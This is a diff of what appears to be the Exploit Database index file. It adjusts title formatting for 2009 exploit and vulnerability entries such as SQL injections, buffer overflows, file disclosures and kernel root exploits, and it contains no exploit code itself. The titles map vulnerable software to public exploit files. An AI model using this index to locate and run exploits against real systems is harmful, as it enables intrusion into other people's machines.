LFI / Remote Code Execution Exploit",2009-05-08,EgiX,php,webapps,0 8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 (ABORT) Remote DoS Exploit",2009-05-11,"Jonathan Salwan",windows,dos,0 -8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 Arbitrary File Disclosure Exploit",2009-05-11,Cyber-Zone,windows,remote,0 +8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure Exploit",2009-05-11,Cyber-Zone,windows,remote,0 8652,platforms/php/webapps/8652.pl,"eggBlog <= 4.1.1 - Local Directory Transversal Exploit",2009-05-11,StAkeR,php,webapps,0 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 (DT/Bypass/SU) Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 8654,platforms/php/webapps/8654.txt,"openWYSIWYG <= 1.4.7 - Local Directory Transversal Vulnerability",2009-05-11,StAkeR,php,webapps,0 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Remote Blind SQL Injection Exploit",2009-05-11,YEnH4ckEr,php,webapps,0 8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 - (.mcp) Universal Seh Overwrite Exploit",2009-05-11,His0k4,windows,local,0 -8657,platforms/windows/local/8657.txt,"EasyPHP 3.0 Arbitrary Modify Configuration File Vulnerability",2009-05-11,Zigma,windows,local,0 +8657,platforms/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File Vulnerability",2009-05-11,Zigma,windows,local,0 8658,platforms/php/webapps/8658.txt,"php recommend <= 1.3 (ab/rfi/ci) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 8659,platforms/php/webapps/8659.php,"Bitweaver <= 2.6 saveFeed() Remote Code Execution Exploit",2009-05-12,Nine:Situations:Group,php,webapps,0 8660,platforms/windows/local/8660.pl,"CastRipper 2.50.70 - (.m3u) Local Buffer Overflow Exploit",2009-05-12,[0]x80->[H]4x²0r,windows,local,0 @@ -8301,7 +8301,7 @@ id,file,description,date,author,platform,type,port 8802,platforms/php/webapps/8802.txt,"Kensei Board <= 2.0.0b - Multiple SQL Injection Vulnerabilities",2009-05-26,cOndemned,php,webapps,0 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 (Auth Bypass) Remote SQL Injection Vulnerability",2009-05-26,"ThE g0bL!N",php,webapps,0 8804,platforms/windows/remote/8804.py,"Soulseek 157 NS Remote Buffer Overflow Exploit (SEH)",2009-05-26,His0k4,windows,remote,2242 -8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 Arbitrary Config File Disclosure Vulnerability",2009-05-26,DarkbiteX,php,webapps,0 +8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure Vulnerability",2009-05-26,DarkbiteX,php,webapps,0 8806,platforms/windows/remote/8806.pl,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl)",2009-05-26,ka0x,windows,remote,0 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 (addadminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 (Auth Bypass) SQL Injection Vulnerability",2009-05-26,ByALBAYX,php,webapps,0 @@ -8392,7 +8392,7 @@ id,file,description,date,author,platform,type,port 8896,platforms/osx/local/8896.c,"Apple MACOS X xnu <= 1228.9.59 - Local Kernel Root Exploit",2009-06-08,mu-b,osx,local,0 8897,platforms/windows/remote/8897.c,"httpdx <= 0.8 FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8898,platforms/php/webapps/8898.txt,"Joomla Component MooFAQ (com_moofaq) LFI Vulnerability",2009-06-08,"Chip d3 bi0s",php,webapps,0 -8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 ActiveX (Accept) Remote Buffer Overflow PoC",2009-06-08,DSecRG,windows,dos,0 +8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow PoC",2009-06-08,DSecRG,windows,dos,0 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 (source_class) Remote SQL Injection Vulnerability",2009-06-08,snakespc,php,webapps,0 8901,platforms/php/webapps/8901.txt,"virtue news (sql/XSS) Multiple Vulnerabilities",2009-06-08,snakespc,php,webapps,0 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 - Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0 @@ -8460,7 +8460,7 @@ id,file,description,date,author,platform,type,port 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 URL Processing Buffer Overflow Exploit (meta)",2009-06-16,Trancer,windows,remote,0 -8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 naPolicyManager.dll ActiveX Arbitrary Data Write Vuln",2009-06-16,callAX,windows,remote,0 +8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 - naPolicyManager.dll ActiveX Arbitrary Data Write Vuln",2009-06-16,callAX,windows,remote,0 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability",2009-06-16,LiquidWorm,windows,dos,0 8974,platforms/php/webapps/8974.txt,"XOOPS <= 2.3.3 - Remote File Disclosure Vulnerability (.htaccess)",2009-06-16,daath,php,webapps,0 8975,platforms/php/webapps/8975.txt,"phpFK 7.03 (page_bottom.php) Local File Inclusion Vulnerability",2009-06-17,ahmadbady,php,webapps,0 @@ -8473,7 +8473,7 @@ id,file,description,date,author,platform,type,port 8982,platforms/linux/dos/8982.txt,"compface <= 1.5.2 (XBM File) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 dlpcrypt.sys Local Kernel ring0 Code Execution Exploit",2009-06-18,mu-b,windows,local,0 8984,platforms/php/webapps/8984.txt,"cms buzz (xss/pc/hi) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 -8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 ActiveX Insecure Method Vuln",2009-06-18,Jambalaya,windows,remote,0 +8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method Vuln",2009-06-18,Jambalaya,windows,remote,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-06-22,HxH,cgi,webapps,0 8988,platforms/php/webapps/8988.txt,"pc4 Uploader <= 10.0 - Remote File Disclosure Vulnerability",2009-06-22,Qabandi,php,webapps,0 8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - Remote SQL/XSS Injection Vulnerabilities",2009-06-22,"ThE g0bL!N",php,webapps,0 @@ -8484,7 +8484,7 @@ id,file,description,date,author,platform,type,port 8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion Vulnerabilities",2009-06-22,CraCkEr,php,webapps,0 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure Vulnerability",2009-06-22,Lo$er,php,webapps,0 8997,platforms/php/webapps/8997.txt,"kasseler CMS (fd/XSS) Multiple Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0 -8998,platforms/php/webapps/8998.txt,"Sourcebans <= 1.4.2 Arbitrary Change Admin Email Vulnerability",2009-06-22,"Mr. Anonymous",php,webapps,0 +8998,platforms/php/webapps/8998.txt,"Sourcebans <= 1.4.2 - Arbitrary Change Admin Email Vulnerability",2009-06-22,"Mr. Anonymous",php,webapps,0 8999,platforms/php/webapps/8999.txt,"Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln",2009-06-22,"Chip d3 bi0s",php,webapps,0 9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 (key) Remote SQL Injection Vulnerability",2009-06-22,Mr.tro0oqy,php,webapps,0 9001,platforms/php/webapps/9001.php,"MyBB <= 1.4.6 - Remote Code Execution Exploit",2009-06-22,The:Paradox,php,webapps,0 @@ -8541,10 +8541,10 @@ id,file,description,date,author,platform,type,port 9056,platforms/php/webapps/9056.txt,"MDPro Module CWGuestBook <= 2.1 - Remote SQL Injection Vulnerability",2009-06-30,Dante90,php,webapps,0 9057,platforms/php/webapps/9057.txt,"tsep <= 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us <= 1.0.1 - Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 -9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 Arbitrary Administrator Account Vulnerability",2009-06-30,"ThE g0bL!N",php,webapps,0 +9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 - Arbitrary Administrator Account Vulnerability",2009-06-30,"ThE g0bL!N",php,webapps,0 9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 (plf File) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - (.M3U ) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 -9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 Arbitrary Delete Message Vulnerability",2009-07-01,Stack,php,webapps,0 +9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 - Arbitrary Delete Message Vulnerability",2009-07-01,Stack,php,webapps,0 9063,platforms/php/webapps/9063.txt,"Messages Library 2.0 Insecure Cookie Handling Vulnerability",2009-07-01,Stack,php,webapps,0 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (seh)",2009-07-01,hack4love,windows,local,0 9065,platforms/windows/remote/9065.c,"Green Dam Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 @@ -8555,7 +8555,7 @@ id,file,description,date,author,platform,type,port 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - (.pls) Local Buffer Overflow Exploit (SEH)",2009-07-01,Stack,windows,local,0 9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x JavaScript Reload Remote Crash Exploit",2009-07-02,SkyOut,multiple,dos,0 9072,platforms/multiple/local/9072.txt,"Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit",2009-07-02,"Sumit Siddharth",multiple,local,0 -9073,platforms/php/webapps/9073.php,"YourTube <= 2.0 Arbitrary Database Disclosure Exploit",2009-07-02,"Security Code Team",php,webapps,0 +9073,platforms/php/webapps/9073.php,"YourTube <= 2.0 - Arbitrary Database Disclosure Exploit",2009-07-02,"Security Code Team",php,webapps,0 9074,platforms/cgi/webapps/9074.txt,"Sourcefire 3D Sensor & Defense Center 4.8.x Privilege Escalation Vuln",2009-07-02,"Gregory Duchemin",cgi,webapps,0 9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 (valid_login) Authentication Bypass Vulnerability",2009-07-02,SirGod,php,webapps,0 9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Remote Blind SQL Injection Exploit",2009-07-02,Qabandi,php,webapps,0 @@ -8568,8 +8568,8 @@ id,file,description,date,author,platform,type,port 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0 9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)",2009-07-09,kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload Vulnerability",2009-07-09,"ThE g0bL!N",php,webapps,0 -9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit",2009-07-09,rEcruit,php,webapps,0 -9088,platforms/php/webapps/9088.txt,"Glossword <= 1.8.11 Arbitrary Uninstall / Install Vulnerability",2009-07-09,Evil-Cod3r,php,webapps,0 +9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password Exploit",2009-07-09,rEcruit,php,webapps,0 +9088,platforms/php/webapps/9088.txt,"Glossword <= 1.8.11 - Arbitrary Uninstall / Install Vulnerability",2009-07-09,Evil-Cod3r,php,webapps,0 9089,platforms/php/webapps/9089.txt,"ClearContent (image.php url) RFI/LFI Vulnerability",2009-07-09,MizoZ,php,webapps,0 9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - (.ofl) Local Heap Overflow PoC",2009-07-09,hack4love,windows,dos,0 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Remote Blind SQL Injection Exploit",2009-07-09,Qabandi,php,webapps,0 @@ -8578,7 +8578,7 @@ id,file,description,date,author,platform,type,port 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite (Id) Remote SQL Injection Vulnerability",2009-07-09,BazOka-HaCkEr,php,webapps,0 9095,platforms/php/webapps/9095.txt,"talkback 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 JSP Source Viewing Vulnerability",2009-07-09,kingcope,windows,remote,0 -9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 Arbitrary File Disclosure Symlink Attack Vulnerability",2009-07-09,kingcope,multiple,local,0 +9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack Vulnerability",2009-07-09,kingcope,multiple,local,0 9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x SQL Injection/phpinfo() Multiple Vulnerabilities",2009-07-09,NoGe,php,webapps,0 9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 (vnews.php id) Remote SQL Injection Exploit",2009-07-09,Mr.tro0oqy,php,webapps,0 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer (AddFavorite) Remote Crash PoC",2009-07-09,Sberry,windows,dos,0 @@ -8631,7 +8631,7 @@ id,file,description,date,author,platform,type,port 9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - (.mpr) Buffer Overflow Exploit (SEH)",2009-07-14,His0k4,windows,local,0 9149,platforms/windows/local/9149.pl,"Icarus 2.0 - (.ICP) Local Buffer Overflow Exploit (SEH)",2009-07-15,hack4love,windows,local,0 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order <= 2.8 - SQL Injection Vulnerability",2009-07-15,"Manh Luat",php,webapps,0 -9151,platforms/php/webapps/9151.txt,"ILIAS Lms <= 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns",2009-07-15,YEnH4ckEr,php,webapps,0 +9151,platforms/php/webapps/9151.txt,"ILIAS Lms <= 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulns",2009-07-15,YEnH4ckEr,php,webapps,0 9152,platforms/windows/local/9152.pl,"AudioPLUS 2.00.215 - (.m3u .lst) Universal SEH Overwrite Exploit",2009-07-15,Stack,windows,local,0 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 (fichier) Remote File Disclosure Vulnerability",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 Completely Blind SQL Injection Exploit",2009-07-15,petros,php,webapps,0 @@ -8639,7 +8639,7 @@ id,file,description,date,author,platform,type,port 9156,platforms/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion Exploit",2009-07-15,IRCRASH,php,webapps,0 9157,platforms/windows/dos/9157.pl,"Hamster Audio Player 0.3a - Local Buffer Overflow PoC",2009-07-15,"ThE g0bL!N",windows,dos,0 9158,platforms/windows/dos/9158.html,"Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC",2009-07-15,"Andrew Haynes",windows,dos,0 -9159,platforms/php/webapps/9159.php,"Infinity <= 2.0.5 Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0 +9159,platforms/php/webapps/9159.php,"Infinity <= 2.0.5 - Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0 9160,platforms/multiple/dos/9160.txt,"Multiple Web Browsers Denial of Service Exploit (1 bug to rule them all)",2009-07-15,"Thierry Zoller",multiple,dos,0 9161,platforms/php/webapps/9161.txt,"Admin News Tools Remote Contents Change Vulnerability",2009-07-15,Securitylab.ir,php,webapps,0 9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 (profile.php) SQL Injection Vulnerability",2009-07-15,Arka69,php,webapps,0 @@ -8663,7 +8663,7 @@ id,file,description,date,author,platform,type,port 9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 (entry) SQL Injection Vulnerability",2009-07-17,JIKO,php,webapps,0 9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 9182,platforms/php/webapps/9182.txt,"AJOX Poll (managepoll.php) Authentication Bypass Vulnerability",2009-07-17,SirGod,php,webapps,0 -9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns",2009-07-17,$qL_DoCt0r,php,webapps,0 +9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 - Auth Bypass SQL Injection / HTML Injection Vulns",2009-07-17,$qL_DoCt0r,php,webapps,0 9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 SITE_fiche.php SQL Injection Vulnerability",2009-07-17,DeCo017,php,webapps,0 9185,platforms/php/webapps/9185.txt,"good/bad vote (xss/lfi) Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - (.m3u) Universal Stack Overflow Exploit",2009-07-17,Stack,windows,local,0 @@ -8680,7 +8680,7 @@ id,file,description,date,author,platform,type,port 9199,platforms/windows/local/9199.txt,"Adobe related service (getPlus_HelperSvc.exe) Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - (.mpl/.m3u) Local Heap Overflow PoC",2009-07-20,hack4love,windows,dos,0 9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln",2009-07-20,Bgh7,php,webapps,0 -9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 Authentication Bypass Vulnerability",2009-07-20,Mr.tro0oqy,php,webapps,0 +9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass Vulnerability",2009-07-20,Mr.tro0oqy,php,webapps,0 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 (sql/xss/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0 @@ -8761,7 +8761,7 @@ id,file,description,date,author,platform,type,port 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script (paidbanner.php ID) SQL Injection Vulnerability",2009-07-28,"ThE g0bL!N",php,webapps,0 9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 (linkout.php id) SQL Injection Vulnerability",2009-07-28,MizoZ,php,webapps,0 9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod <= 2.0.4 - Blind SQL Injection Exploit",2009-07-28,Dante90,php,webapps,0 -9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 Arbitrary Shell Upload Vulnerability",2009-07-28,Mr.tro0oqy,php,webapps,0 +9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 - Arbitrary Shell Upload Vulnerability",2009-07-28,Mr.tro0oqy,php,webapps,0 9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - (.mpf) Local BoF Exploit (SEH)",2009-07-28,Koshi,windows,local,0 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0 9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 (login_ok) Auth Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0 @@ -8871,7 +8871,7 @@ id,file,description,date,author,platform,type,port 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 (dd/ich) Multiple Vulnerabilities",2009-08-07,ZoRLu,php,webapps,0 9401,platforms/windows/dos/9401.py,"Spiceworks 3.6 Accept Parameter Overflow Crash Exploit",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 9404,platforms/php/webapps/9404.txt,"SmilieScript <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-08-10,Mr.tro0oqy,php,webapps,0 -9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 Authenticated Arbitrary Code Execution Vulnerability",2009-08-10,"RedTeam Pentesting",php,webapps,0 +9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution Vulnerability",2009-08-10,"RedTeam Pentesting",php,webapps,0 9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability",2009-08-10,Ins3t,php,webapps,0 9407,platforms/php/webapps/9407.txt,"CMS Made Simple <= 1.6.2 - Local File Disclosure Vulnerability",2009-08-10,IHTeam,php,webapps,0 9408,platforms/php/webapps/9408.php,"Joomla Component Kunena Forums (com_kunena) bSQL Injection Exploit",2009-08-10,"ilker Kandemir",php,webapps,0 @@ -8911,7 +8911,7 @@ id,file,description,date,author,platform,type,port 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection Exploit",2009-08-18,IRCRASH,php,webapps,0 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection Exploit",2009-08-18,NoGe,php,webapps,0 -9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 +9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client tgbvpn.sys Local DoS Exploit",2009-08-18,Evilcry,windows,dos,0 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 (RCE/CSRF/LFI/XSS) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"Dreampics Builder (exhibition_id) Remote SQL Injection Vulnerability",2009-08-18,Mr.SQL,php,webapps,0 @@ -8956,7 +8956,7 @@ id,file,description,date,author,platform,type,port 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure Vulns",2009-08-24,IRCRASH,php,webapps,0 9491,platforms/php/webapps/9491.txt,"Dow Group (new.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional Local Kernel Buffer Overflow Exploit",2009-08-24,Heurs,windows,local,0 -9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 Arbitrary Database Disclosure Vuln",2009-08-24,Septemb0x,php,webapps,0 +9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure Vuln",2009-08-24,Septemb0x,php,webapps,0 9494,platforms/php/webapps/9494.txt,"humanCMS (Auth Bypass) SQL Injection Vulnerability",2009-08-24,next,php,webapps,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - (.wav ) Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 9496,platforms/windows/dos/9496.txt,"WAR-FTPD 1.65 (MKD/CD Requests) Denial of Service Vuln",2009-08-24,"opt!x hacker",windows,dos,0 @@ -8980,7 +8980,7 @@ id,file,description,date,author,platform,type,port 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0 -9517,platforms/windows/dos/9517.txt,"Lotus note connector for Blackberry Manager 5.0.0.11 ActiveX DoS Vuln",2009-08-25,"Francis Provencher",windows,dos,0 +9517,platforms/windows/dos/9517.txt,"Lotus note connector for Blackberry Manager 5.0.0.11 - ActiveX DoS Vuln",2009-08-25,"Francis Provencher",windows,dos,0 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0 @@ -9059,7 +9059,7 @@ id,file,description,date,author,platform,type,port 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0 9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0 -9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0 +9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0 9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln",2009-09-09,"EA Ngel",php,webapps,0 9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0 9602,platforms/php/webapps/9602.pl,"Joomla Component TPDugg 1.1 - Blind SQL Injection Exploit",2009-09-09,NoGe,php,webapps,0 @@ -9087,7 +9087,7 @@ id,file,description,date,author,platform,type,port 9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro <= 6.0.0 - (.MID) Integer Overflow PoC",2009-09-10,Dr_IDE,windows,dos,0 9627,platforms/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Exploit Framework",2009-09-10,spender,linux,local,0 9628,platforms/windows/local/9628.pl,"Icarus 2.0 - (.pgn) Universal Local Buffer Overflow Exploit (SEH)",2009-09-10,germaya_x,windows,local,0 -9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x Arbitrary File Upload Vulnerability",2009-09-10,"Alexander Concha",php,webapps,0 +9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload Vulnerability",2009-09-10,"Alexander Concha",php,webapps,0 9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager (action) SQL Injection Vulnerability",2009-09-10,Mr.SQL,php,webapps,0 9631,platforms/php/webapps/9631.txt,"iDesk (download.php cat_id) Remote SQL Injection Vulnerability",2009-09-10,Mr.SQL,php,webapps,0 9632,platforms/php/webapps/9632.txt,"Accommodation Hotel Booking Portal (hotel_id) SQL Injection Vuln",2009-09-10,Mr.SQL,php,webapps,0 @@ -9110,7 +9110,7 @@ id,file,description,date,author,platform,type,port 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure Vuln",2009-09-11,Dr_IDE,windows,remote,0 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Remote Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0 -9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80 +9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Auth Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80 9653,platforms/php/webapps/9653.txt,"Joomla Component Turtushout 0.11 (Name) SQL Injection Vulnerability",2009-09-14,jdc,php,webapps,0 9654,platforms/php/webapps/9654.php,"Joomla Component AlphaUserPoints SQL Injection Exploit",2009-09-14,jdc,php,webapps,0 9655,platforms/windows/local/9655.pl,"Invisible Browsing 5.0.52 - (.ibkey) Local Buffer Overflow Exploit",2009-09-14,PLATEN,windows,local,0 @@ -9118,7 +9118,7 @@ 